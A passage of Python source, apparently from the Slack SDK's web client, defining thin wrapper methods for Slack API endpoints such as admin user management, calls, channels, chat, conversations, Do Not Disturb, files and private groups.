"""Add one or more default channels to an IDP group.
Args:
usergroup_id (str): ID of the IDP group to list default channels for. e.g. 'S1234'
"""
kwargs.update({"usergroup_id": usergroup_id})
return self.api_call("admin.usergroups.listChannels", json=kwargs)
def admin_usergroups_removeChannels(
self, *, usergroup_id: str, channel_ids: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Add one or more default channels to an IDP group.
Args:
usergroup_id (str): ID of the IDP group. e.g. 'S1234'
channel_ids (str or list): Comma separated string of channel IDs. e.g. 'C123,C234' or ['C123', 'C234']
"""
kwargs.update({"usergroup_id": usergroup_id})
if isinstance(channel_ids, (list, Tuple)):
kwargs.update({"channel_ids": ",".join(channel_ids)})
else:
kwargs.update({"channel_ids": channel_ids})
return self.api_call("admin.usergroups.removeChannels", params=kwargs)
def admin_users_assign(
self, *, team_id: str, user_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Add an Enterprise user to a workspace.
Args:
team_id (str): ID of the team. e.g. 'T1234'
user_id (str): ID of the user to add to the workspace.
"""
kwargs.update({"team_id": team_id, "user_id": user_id})
return self.api_call("admin.users.assign", json=kwargs)
def admin_users_invite(
self,
*,
team_id: str,
email: str,
channel_ids: Union[str, Sequence[str]],
**kwargs
) -> Union[Future, SlackResponse]:
"""Invite a user to a workspace.
Args:
team_id (str): ID of the team. e.g. 'T1234'
email (str): The email address of the person to invite. e.g. 'joe@email.com'
channel_ids (str or list): A list of channel_ids for this user to join.
At least one channel is required. e.g. ['C1A2B3C4D', 'C26Z25Y24']
"""
kwargs.update({"team_id": team_id, "email": email})
if isinstance(channel_ids, (list, Tuple)):
kwargs.update({"channel_ids": ",".join(channel_ids)})
else:
kwargs.update({"channel_ids": channel_ids})
return self.api_call("admin.users.invite", params=kwargs)
def admin_users_list(
self, *, team_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""List users on a workspace
Args:
team_id (str): ID of the team. e.g. 'T1234'
"""
kwargs.update({"team_id": team_id})
return self.api_call("admin.users.list", params=kwargs)
def admin_users_remove(
self, *, team_id: str, user_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Remove a user from a workspace.
Args:
team_id (str): ID of the team. e.g. 'T1234'
user_id (str): The ID of the user to remove. e.g. 'W12345678'
"""
kwargs.update({"team_id": team_id, "user_id": user_id})
return self.api_call("admin.users.remove", json=kwargs)
def admin_users_setAdmin(
self, *, team_id: str, user_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Set an existing guest, regular user, or owner to be an admin user.
Args:
team_id (str): ID of the team. e.g. 'T1234'
user_id (str): The ID of the user to remove. e.g. 'W12345678'
"""
kwargs.update({"team_id": team_id, "user_id": user_id})
return self.api_call("admin.users.setAdmin", json=kwargs)
def admin_users_setExpiration(
self, *, expiration_ts: int, team_id: str, user_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Set an expiration for a guest user.
Args:
expiration_ts (int): Timestamp when guest account should be disabled. e.g. '1234567890'
team_id (str): ID of the team. e.g. 'T1234'
user_id (str): The ID of the user to set an expiration for. e.g. 'W12345678'
"""
kwargs.update(
{"expiration_ts": expiration_ts, "team_id": team_id, "user_id": user_id}
)
return self.api_call("admin.users.setExpiration", json=kwargs)
def admin_users_setOwner(
self, *, team_id: str, user_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Set an existing guest, regular user, or admin user to be a workspace owner.
Args:
team_id (str): ID of the team. e.g. 'T1234'
user_id (str): The ID of the user to remove. e.g. 'W12345678'
"""
kwargs.update({"team_id": team_id, "user_id": user_id})
return self.api_call("admin.users.setOwner", json=kwargs)
def admin_users_setRegular(
self, *, team_id: str, user_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Set an existing guest user, admin user, or owner to be a regular user.
Args:
team_id (str): ID of the team. e.g. 'T1234'
user_id (str): The ID of the user to remove. e.g. 'W12345678'
"""
kwargs.update({"team_id": team_id, "user_id": user_id})
return self.api_call("admin.users.setRegular", json=kwargs)
def api_test(self, **kwargs) -> Union[Future, SlackResponse]:
"""Checks API calling code."""
return self.api_call("api.test", json=kwargs)
def apps_connections_open(
self, *, app_token: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Get a new WSS URL for Socket Mode"""
kwargs.update({"token": app_token})
return self.api_call("apps.connections.open", http_verb="POST", params=kwargs)
def apps_event_authorizations_list(
self, event_context: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Get a list of authorizations for the given event context.
Each authorization represents an app installation that the event is visible to.
Args:
event_context (str): You'll receive an event_context identifying an event in each event payload sent to your app.
"""
kwargs.update({"event_context": event_context})
return self.api_call("apps.event.authorizations.list", params=kwargs)
def apps_uninstall(
self, client_id: str, client_secret: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Uninstalls your app from a workspace.
Args:
client_id (str): Issued when you created your application. e.g. '56579136444.26251006572'
client_secret (str): Issued when you created your application. e.g. 'f25b5ceaf8a3c2a2c4f52bb4f0b0499e'
"""
kwargs.update({"client_id": client_id, "client_secret": client_secret})
return self.api_call("apps.uninstall", params=kwargs)
def auth_revoke(self, **kwargs) -> Union[Future, SlackResponse]:
"""Revokes a token."""
return self.api_call("auth.revoke", http_verb="GET", params=kwargs)
def auth_test(self, **kwargs) -> Union[Future, SlackResponse]:
"""Checks authentication & identity."""
return self.api_call("auth.test", json=kwargs)
def bots_info(self, **kwargs) -> Union[Future, SlackResponse]:
"""Gets information about a bot user."""
return self.api_call("bots.info", http_verb="GET", params=kwargs)
def calls_add(
self, *, external_unique_id: str, join_url: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Registers a new Call.
Args:
external_unique_id (str): An ID supplied by the 3rd-party Call provider.
It must be unique across all Calls from that service.
e.g. '025169F6-E37A-4E62-BB54-7F93A0FC4C1F'
join_url (str): The URL required for a client to join the Call.
e.g. 'https://example.com/calls/1234567890'
"""
kwargs.update({"external_unique_id": external_unique_id, "join_url": join_url})
_update_call_participants( # skipcq: PTC-W0039
kwargs, kwargs.get("users", None) # skipcq: PTC-W0039
) # skipcq: PTC-W0039
return self.api_call("calls.add", http_verb="POST", params=kwargs)
def calls_end(
self, *, id: str, **kwargs
) -> Union[Future, SlackResponse]: # skipcq: PYL-W0622
"""Ends a Call.
Args:
id (str): id returned when registering the call using the calls.add method.
"""
kwargs.update({"id": id})
return self.api_call("calls.end", http_verb="POST", params=kwargs)
def calls_info(
self, *, id: str, **kwargs
) -> Union[Future, SlackResponse]: # skipcq: PYL-W0622
"""Returns information about a Call.
Args:
id (str): id returned when registering the call using the calls.add method.
"""
kwargs.update({"id": id})
return self.api_call("calls.info", http_verb="POST", params=kwargs)
def calls_participants_add(
self,
*,
id: str, # skipcq: PYL-W0622
users: Union[str, Sequence[Dict[str, str]]],
**kwargs
) -> Union[Future, SlackResponse]:
"""Registers new participants added to a Call.
Args:
id (str): id returned when registering the call using the calls.add method.
users: (list): The list of users to add as participants in the Call.
"""
kwargs.update({"id": id})
_update_call_participants(kwargs, users)
return self.api_call("calls.participants.add", http_verb="POST", params=kwargs)
def calls_participants_remove(
self,
*,
id: str, # skipcq: PYL-W0622
users: Union[str, Sequence[Dict[str, str]]],
**kwargs
) -> Union[Future, SlackResponse]:
"""Registers participants removed from a Call.
Args:
id (str): id returned when registering the call using the calls.add method.
users: (list): The list of users to remove as participants in the Call.
"""
kwargs.update({"id": id})
_update_call_participants(kwargs, users)
return self.api_call(
"calls.participants.remove", http_verb="POST", params=kwargs
)
def calls_update(
self, *, id: str, **kwargs
) -> Union[Future, SlackResponse]: # skipcq: PYL-W0622
"""Updates information about a Call.
Args:
id (str): id returned by the calls.add method.
"""
kwargs.update({"id": id})
return self.api_call("calls.update", http_verb="POST", params=kwargs)
def channels_archive(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Archives a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("channels.archive", json=kwargs)
def channels_create(self, *, name: str, **kwargs) -> Union[Future, SlackResponse]:
"""Creates a channel.
Args:
name (str): The name of the channel. e.g. 'mychannel'
"""
kwargs.update({"name": name})
return self.api_call("channels.create", json=kwargs)
def channels_history(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Fetches history of messages and events from a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("channels.history", http_verb="GET", params=kwargs)
def channels_info(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Gets information about a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("channels.info", http_verb="GET", params=kwargs)
def channels_invite(
self, *, channel: str, user: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Invites a user to a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
user (str): The user id. e.g. 'U1234567890'
"""
kwargs.update({"channel": channel, "user": user})
return self.api_call("channels.invite", json=kwargs)
def channels_join(self, *, name: str, **kwargs) -> Union[Future, SlackResponse]:
"""Joins a channel, creating it if needed.
Args:
name (str): The channel name. e.g. '#general'
"""
kwargs.update({"name": name})
return self.api_call("channels.join", json=kwargs)
def channels_kick(
self, *, channel: str, user: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Removes a user from a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
user (str): The user id. e.g. 'U1234567890'
"""
kwargs.update({"channel": channel, "user": user})
return self.api_call("channels.kick", json=kwargs)
def channels_leave(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Leaves a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("channels.leave", json=kwargs)
def channels_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists all channels in a Slack team."""
return self.api_call("channels.list", http_verb="GET", params=kwargs)
def channels_mark(
self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the read cursor in a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
ts (str): Timestamp of the most recently seen message. e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "ts": ts})
return self.api_call("channels.mark", json=kwargs)
def channels_rename(
self, *, channel: str, name: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Renames a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
name (str): The new channel name. e.g. 'newchannel'
"""
kwargs.update({"channel": channel, "name": name})
return self.api_call("channels.rename", json=kwargs)
def channels_replies(
self, *, channel: str, thread_ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve a thread of messages posted to a channel
Args:
channel (str): The channel id. e.g. 'C1234567890'
thread_ts (str): The timestamp of an existing message with 0 or more replies.
e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "thread_ts": thread_ts})
return self.api_call("channels.replies", http_verb="GET", params=kwargs)
def channels_setPurpose(
self, *, channel: str, purpose: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the purpose for a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
purpose (str): The new purpose for the channel. e.g. 'My Purpose'
"""
kwargs.update({"channel": channel, "purpose": purpose})
return self.api_call("channels.setPurpose", json=kwargs)
def channels_setTopic(
self, *, channel: str, topic: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the topic for a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
topic (str): The new topic for the channel. e.g. 'My Topic'
"""
kwargs.update({"channel": channel, "topic": topic})
return self.api_call("channels.setTopic", json=kwargs)
def channels_unarchive(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Unarchives a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("channels.unarchive", json=kwargs)
def chat_delete(
self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Deletes a message.
Args:
channel (str): Channel containing the message to be deleted. e.g. 'C1234567890'
ts (str): Timestamp of the message to be deleted. e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "ts": ts})
return self.api_call("chat.delete", json=kwargs)
def chat_deleteScheduledMessage(
self, *, channel: str, scheduled_message_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Deletes a scheduled message.
Args:
channel (str): The channel the scheduled_message is posting to. e.g. 'C1234567890'
scheduled_message_id (str): scheduled_message_id returned from call to chat.scheduleMessage e.g. 'Q1234ABCD'
"""
kwargs.update(
{"channel": channel, "scheduled_message_id": scheduled_message_id}
)
return self.api_call("chat.deleteScheduledMessage", json=kwargs)
def chat_getPermalink(
self, *, channel: str, message_ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve a permalink URL for a specific extant message
Args:
channel (str): The channel id. e.g. 'C1234567890'
message_ts (str): The timestamp. e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "message_ts": message_ts})
return self.api_call("chat.getPermalink", http_verb="GET", params=kwargs)
def chat_meMessage(
self, *, channel: str, text: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Share a me message into a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
text (str): The message you'd like to share. e.g. 'Hello world'
"""
kwargs.update({"channel": channel, "text": text})
return self.api_call("chat.meMessage", json=kwargs)
def chat_postEphemeral(
self, *, channel: str, user: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sends an ephemeral message to a user in a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
user (str): The id of user who should see the message. e.g. 'U0BPQUNTA'
text (str): The message you'd like to share. e.g. 'Hello world'
text is not required when presenting blocks.
blocks (list): A list of either dict values or `slack_sdk.models.blocks.Block` objects.
Blocks are required when not presenting text.
e.g. [{"type": "section", "text": {"type": "plain_text", "text": "Hello world"}}]
"""
kwargs.update({"channel": channel, "user": user})
_parse_web_class_objects(kwargs)
_warn_if_text_is_missing("chat.postEphemeral", kwargs)
return self.api_call("chat.postEphemeral", json=kwargs)
def chat_postMessage(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sends a message to a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
text (str): The message you'd like to share. e.g. 'Hello world'
text is not required when presenting blocks.
blocks (list): A list of either dict values or `slack_sdk.models.blocks.Block` objects.
Blocks are required when not presenting text.
e.g. [{"type": "section", "text": {"type": "plain_text", "text": "Hello world"}}]
"""
kwargs.update({"channel": channel})
_parse_web_class_objects(kwargs)
_warn_if_text_is_missing("chat.postMessage", kwargs)
return self.api_call("chat.postMessage", json=kwargs)
def chat_scheduleMessage(
self, *, channel: str, post_at: str, text: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Schedules a message.
Args:
channel (str): The channel the scheduled_message is posting to. e.g. 'C1234567890'
post_at (str): Unix EPOCH timestamp of time in future to send the message. e.g. '299876400'
text (str): The message you'd like to send. e.g. 'Hello world'
"""
kwargs.update({"channel": channel, "post_at": post_at, "text": text})
_parse_web_class_objects(kwargs)
_warn_if_text_is_missing("chat.scheduleMessage", kwargs)
return self.api_call("chat.scheduleMessage", json=kwargs)
def chat_unfurl(
self, *, channel: str, ts: str, unfurls: dict, **kwargs
) -> Union[Future, SlackResponse]:
"""Provide custom unfurl behavior for user-posted URLs.
Args:
channel (str): The Channel ID of the message. e.g. 'C1234567890'
ts (str): Timestamp of the message to add unfurl behavior to. e.g. '1234567890.123456'
unfurls (dict): a dict of the specific URLs you're offering an unfurl for.
e.g. {"https://example.com/": {"text": "Every day is the test."}}
"""
kwargs.update({"channel": channel, "ts": ts, "unfurls": unfurls})
return self.api_call("chat.unfurl", json=kwargs)
def chat_update(
self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Updates a message in a channel.
Args:
channel (str): The channel containing the message to be updated. e.g. 'C1234567890'
ts (str): Timestamp of the message to be updated. e.g. '1234567890.123456'
text (str): The message you'd like to share. e.g. 'Hello world'
text is not required when presenting blocks.
blocks (list): A list of either dict values or `slack_sdk.models.blocks.Block` objects.
Blocks are required when not presenting text.
e.g. [{"type": "section", "text": {"type": "plain_text", "text": "Hello world"}}]
"""
kwargs.update({"channel": channel, "ts": ts})
_parse_web_class_objects(kwargs)
_warn_if_text_is_missing("chat.update", kwargs)
return self.api_call("chat.update", json=kwargs)
def chat_scheduledMessages_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists all scheduled messages."""
return self.api_call("chat.scheduledMessages.list", params=kwargs)
def conversations_archive(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Archives a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.archive", json=kwargs)
def conversations_close(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Closes a direct message or multi-person direct message.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.close", json=kwargs)
def conversations_create(
self, *, name: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Initiates a public or private channel-based conversation
Args:
name (str): The name of the channel. e.g. 'mychannel'
"""
kwargs.update({"name": name})
return self.api_call("conversations.create", json=kwargs)
def conversations_history(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Fetches a conversation's history of messages and events.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.history", http_verb="GET", params=kwargs)
def conversations_info(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve information about a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.info", http_verb="GET", params=kwargs)
def conversations_invite(
self, *, channel: str, users: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Invites users to a channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
users (str or list): An list of user id's to invite. e.g. ['U2345678901', 'U3456789012']
"""
kwargs.update({"channel": channel})
if isinstance(users, (list, Tuple)):
kwargs.update({"users": ",".join(users)})
else:
kwargs.update({"users": users})
return self.api_call("conversations.invite", params=kwargs)
def conversations_join(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Joins an existing conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.join", json=kwargs)
def conversations_kick(
self, *, channel: str, user: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Removes a user from a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
user (str): The id of the user to kick. e.g. 'U2345678901'
"""
kwargs.update({"channel": channel, "user": user})
return self.api_call("conversations.kick", json=kwargs)
def conversations_leave(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Leaves a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.leave", json=kwargs)
def conversations_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists all channels in a Slack team."""
return self.api_call("conversations.list", http_verb="GET", params=kwargs)
def conversations_mark(
self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the read cursor in a channel.
Args:
channel (str): Channel or conversation to set the read cursor for e.g. 'C1234567890'
ts (str): Unique identifier of message to mark as most recently seen in the convo e.g. '1593473566.000200'
"""
kwargs.update({"channel": channel, "ts": ts})
return self.api_call("conversations.mark", json=kwargs)
def conversations_members(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve members of a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.members", http_verb="GET", params=kwargs)
def conversations_open(self, **kwargs) -> Union[Future, SlackResponse]:
"""Opens or resumes a direct message or multi-person direct message."""
return self.api_call("conversations.open", json=kwargs)
def conversations_rename(
self, *, channel: str, name: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Renames a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
name (str): The new channel name. e.g. 'newchannel'
"""
kwargs.update({"channel": channel, "name": name})
return self.api_call("conversations.rename", json=kwargs)
def conversations_replies(
self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieve a thread of messages posted to a conversation
Args:
channel (str): Conversation ID to fetch thread from. e.g. 'C1234567890'
ts (str): Unique identifier of a thread's parent message. e.g. '1234567890.123456'
"""
kwargs.update({"channel": channel, "ts": ts})
return self.api_call("conversations.replies", http_verb="GET", params=kwargs)
def conversations_setPurpose(
self, *, channel: str, purpose: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the purpose for a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
purpose (str): The new purpose for the channel. e.g. 'My Purpose'
"""
kwargs.update({"channel": channel, "purpose": purpose})
return self.api_call("conversations.setPurpose", json=kwargs)
def conversations_setTopic(
self, *, channel: str, topic: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the topic for a conversation.
Args:
channel (str): The channel id. e.g. 'C1234567890'
topic (str): The new topic for the channel. e.g. 'My Topic'
"""
kwargs.update({"channel": channel, "topic": topic})
return self.api_call("conversations.setTopic", json=kwargs)
def conversations_unarchive(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Reverses conversation archival.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("conversations.unarchive", json=kwargs)
def dialog_open(
self, *, dialog: dict, trigger_id: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Open a dialog with a user.
Args:
dialog (dict): A dictionary of dialog arguments.
{
"callback_id": "46eh782b0",
"title": "Request something",
"submit_label": "Request",
"state": "Max",
"elements": [
{
"type": "text",
"label": "Origin",
"name": "loc_origin"
},
{
"type": "text",
"label": "Destination",
"name": "loc_destination"
}
]
}
trigger_id (str): The trigger id of a recent message interaction.
e.g. '12345.98765.abcd2358fdea'
"""
kwargs.update({"dialog": dialog, "trigger_id": trigger_id})
return self.api_call("dialog.open", json=kwargs)
def dnd_endDnd(self, **kwargs) -> Union[Future, SlackResponse]:
"""Ends the current user's Do Not Disturb session immediately."""
return self.api_call("dnd.endDnd", json=kwargs)
def dnd_endSnooze(self, **kwargs) -> Union[Future, SlackResponse]:
"""Ends the current user's snooze mode immediately."""
return self.api_call("dnd.endSnooze", json=kwargs)
def dnd_info(self, **kwargs) -> Union[Future, SlackResponse]:
"""Retrieves a user's current Do Not Disturb status."""
return self.api_call("dnd.info", http_verb="GET", params=kwargs)
def dnd_setSnooze(
self, *, num_minutes: int, **kwargs
) -> Union[Future, SlackResponse]:
"""Turns on Do Not Disturb mode for the current user, or changes its duration.
Args:
num_minutes (int): The snooze duration. e.g. 60
"""
kwargs.update({"num_minutes": num_minutes})
return self.api_call("dnd.setSnooze", http_verb="GET", params=kwargs)
def dnd_teamInfo(
self, users: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Retrieves the Do Not Disturb status for users on a team.
Args:
users (str or list): User IDs to fetch information e.g. 'U123,U234' or ["U123", "U234"]
"""
if isinstance(users, (list, Tuple)):
kwargs.update({"users": ",".join(users)})
else:
kwargs.update({"users": users})
return self.api_call("dnd.teamInfo", http_verb="GET", params=kwargs)
def emoji_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists custom emoji for a team."""
return self.api_call("emoji.list", http_verb="GET", params=kwargs)
def files_comments_delete(
self, *, file: str, id: str, **kwargs # skipcq: PYL-W0622
) -> Union[Future, SlackResponse]:
"""Deletes an existing comment on a file.
Args:
file (str): The file id. e.g. 'F1234467890'
id (str): The file comment id. e.g. 'Fc1234567890'
"""
kwargs.update({"file": file, "id": id})
return self.api_call("files.comments.delete", json=kwargs)
def files_delete(self, *, file: str, **kwargs) -> Union[Future, SlackResponse]:
"""Deletes a file.
Args:
file (str): The file id. e.g. 'F1234467890'
"""
kwargs.update({"file": file})
return self.api_call("files.delete", json=kwargs)
def files_info(self, *, file: str, **kwargs) -> Union[Future, SlackResponse]:
"""Gets information about a team file.
Args:
file (str): The file id. e.g. 'F1234467890'
"""
kwargs.update({"file": file})
return self.api_call("files.info", http_verb="GET", params=kwargs)
def files_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists & filters team files."""
return self.api_call("files.list", http_verb="GET", params=kwargs)
def files_remote_info(self, **kwargs) -> Union[Future, SlackResponse]:
"""Retrieve information about a remote file added to Slack."""
return self.api_call("files.remote.info", http_verb="GET", params=kwargs)
def files_remote_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Retrieve information about a remote file added to Slack."""
return self.api_call("files.remote.list", http_verb="GET", params=kwargs)
def files_remote_add(
self, *, external_id: str, external_url: str, title: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Adds a file from a remote service.
Args:
external_id (str): Creator defined GUID for the file. e.g. '123456'
external_url (str): URL of the remote file. e.g. 'http://example.com/my_cloud_service_file/abc123'
title (str): Title of the file being shared. e.g. 'Danger, High Voltage!'
"""
kwargs.update(
{"external_id": external_id, "external_url": external_url, "title": title}
)
files = None
# preview_image (file): Preview of the document via multipart/form-data.
if "preview_image" in kwargs:
files = {"preview_image": kwargs.pop("preview_image")}
return self.api_call(
# Intentionally using "POST" method over "GET" here
"files.remote.add",
http_verb="POST",
data=kwargs,
files=files,
)
def files_remote_update(self, **kwargs) -> Union[Future, SlackResponse]:
"""Updates an existing remote file."""
return self.api_call("files.remote.update", http_verb="GET", params=kwargs)
def files_remote_remove(self, **kwargs) -> Union[Future, SlackResponse]:
"""Remove a remote file."""
return self.api_call("files.remote.remove", http_verb="GET", params=kwargs)
def files_remote_share(
self, *, channels: Union[str, Sequence[str]], **kwargs
) -> Union[Future, SlackResponse]:
"""Share a remote file into a channel.
Args:
channels (str or list): Comma-separated list of channel IDs where the file will be shared.
e.g. ['C1234567890', 'C2345678901']
"""
if isinstance(channels, (list, Tuple)):
kwargs.update({"channels": ",".join(channels)})
else:
kwargs.update({"channels": channels})
return self.api_call("files.remote.share", http_verb="GET", params=kwargs)
def files_revokePublicURL(
self, *, file: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Revokes public/external sharing access for a file
Args:
file (str): The file id. e.g. 'F1234467890'
"""
kwargs.update({"file": file})
return self.api_call("files.revokePublicURL", json=kwargs)
def files_sharedPublicURL(
self, *, file: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Enables a file for public/external sharing.
Args:
file (str): The file id. e.g. 'F1234467890'
"""
kwargs.update({"file": file})
return self.api_call("files.sharedPublicURL", json=kwargs)
def files_upload(
self, *, file: Union[str, bytes, IOBase] = None, content: str = None, **kwargs
) -> Union[Future, SlackResponse]:
"""Uploads or creates a file.
Args:
file (str): Supply a file path.
when you'd like to upload a specific file. e.g. 'dramacat.gif'
content (str): Supply content when you'd like to create an
editable text file containing the specified text. e.g. 'launch plan'
Raises:
SlackRequestError: If neither or both the `file` and `content` args are specified.
"""
if file is None and content is None:
raise e.SlackRequestError("The file or content argument must be specified.")
if file is not None and content is not None:
raise e.SlackRequestError(
"You cannot specify both the file and the content argument."
)
if file:
if "filename" not in kwargs and isinstance(file, str):
# use the local filename if filename is missing
kwargs["filename"] = file.split(os.path.sep)[-1]
return self.api_call("files.upload", files={"file": file}, data=kwargs)
data = kwargs.copy()
data.update({"content": content})
return self.api_call("files.upload", data=data)
def groups_archive(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Archives a private channel.
Args:
channel (str): The channel id. e.g. 'C1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("groups.archive", json=kwargs)
def groups_create(self, *, name: str, **kwargs) -> Union[Future, SlackResponse]:
"""Creates a private channel.
Args:
name (str): The name of the private group. e.g. 'mychannel'
"""
kwargs.update({"name": name})
return self.api_call("groups.create", json=kwargs)
def groups_createChild(
self, *, channel: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Clones and archives a private channel.
Args:
channel (str): The group id. e.g. 'G1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("groups.createChild", http_verb="GET", params=kwargs)
def groups_history(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Fetches history of messages and events from a private channel.
Args:
channel (str): The group id. e.g. 'G1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("groups.history", http_verb="GET", params=kwargs)
def groups_info(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Gets information about a private channel.
Args:
channel (str): The group id. e.g. 'G1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("groups.info", http_verb="GET", params=kwargs)
def groups_invite(
self, *, channel: str, user: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Invites a user to a private channel.
Args:
channel (str): The group id. e.g. 'G1234567890'
user (str): The user id. e.g. 'U1234567890'
"""
kwargs.update({"channel": channel, "user": user})
return self.api_call("groups.invite", json=kwargs)
def groups_kick(
self, *, channel: str, user: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Removes a user from a private channel.
Args:
channel (str): The group id. e.g. 'G1234567890'
user (str): The user id. e.g. 'U1234567890'
"""
kwargs.update({"channel": channel, "user": user})
return self.api_call("groups.kick", json=kwargs)
def groups_leave(self, *, channel: str, **kwargs) -> Union[Future, SlackResponse]:
"""Leaves a private channel.
Args:
channel (str): The group id. e.g. 'G1234567890'
"""
kwargs.update({"channel": channel})
return self.api_call("groups.leave", json=kwargs)
def groups_list(self, **kwargs) -> Union[Future, SlackResponse]:
"""Lists private channels that the calling user has access to."""
return self.api_call("groups.list", http_verb="GET", params=kwargs)
def groups_mark(
self, *, channel: str, ts: str, **kwargs
) -> Union[Future, SlackResponse]:
"""Sets the read cursor in a private channel.
Args:
